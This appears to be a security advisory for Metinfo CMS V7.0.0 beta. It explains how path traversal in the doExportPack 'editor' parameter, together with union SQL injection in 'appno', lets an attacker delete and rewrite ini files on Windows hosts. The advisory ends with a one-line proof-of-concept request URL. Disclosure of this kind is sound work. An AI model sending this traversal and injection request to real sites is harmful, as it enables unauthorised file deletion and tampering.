Description
Vulnerability Name: Metinfo CMS ini file modify vulnerability
Product Homepage: https://www.metinfo.cn/
Software link: https://u.mituo.cn/api/metinfo/download/7.0.0beta
Version: V7.0.0 beta
(This vulnerability only occur in Window OS)
In /language/admin/language_general.class.php doExportPack Method
In this method We can find editor and site parameter makes filename value and use it for
delfile method's argument
Let's take a look at app/system/include/function/file.func.php source code
When we check delfile method we use filename argument for file_exists function and if
return value is true unlink filename argument file will be unlink
Before we analyze more about this point.
Let's take a look at about file_exists function's difference between in Linux and Windows
In Linux (first picture) if there is no real dirctory which name is asdf function do not return true
value unliness there is ../ value. But In Windows file_exists funciotn return true value if there is
fake directory which name is asd (second picture).
We will use this point for vulnerability.
Okay after unlink file doExportPack method call doget_admin_pack method
Let's take a look at doget_admin_pack method
In Source Code If site parameter value is 'admin' or 'web' we use appno parameter value for SQL
query. And there is any single quarter for appno parameter.
So we can execute Union Sql Injection
Furthermore We use return of Sql query for new ini file's content
Cause we have Union SQL injection vulnerabilty We can modify ini file's content
So attack scenario is below
- give
siteparameter value for 'admin' or 'web' and giveeditorparameter for
'../../../---/{ini-filename}
- give
appnoparameter for SQLI POC which include ini file content
In Linux if there is no language_admin_ directory this vulnerability will not occur
But Windows doesn't need language_admin_ directory this vulnerabilty will execute 100%
(Of course in Lniux has language_admin_ or any other directory name which can make by
site and editor parameter this vulnerability will execute)
POC :
/admin/?n=language&c=language_general&a=doExportPack&site=web&editor=/../../../../../../Windows/test&appno= 1=1 union select 0x49732069742076756c6e657261626c653f3f,ox5965732121










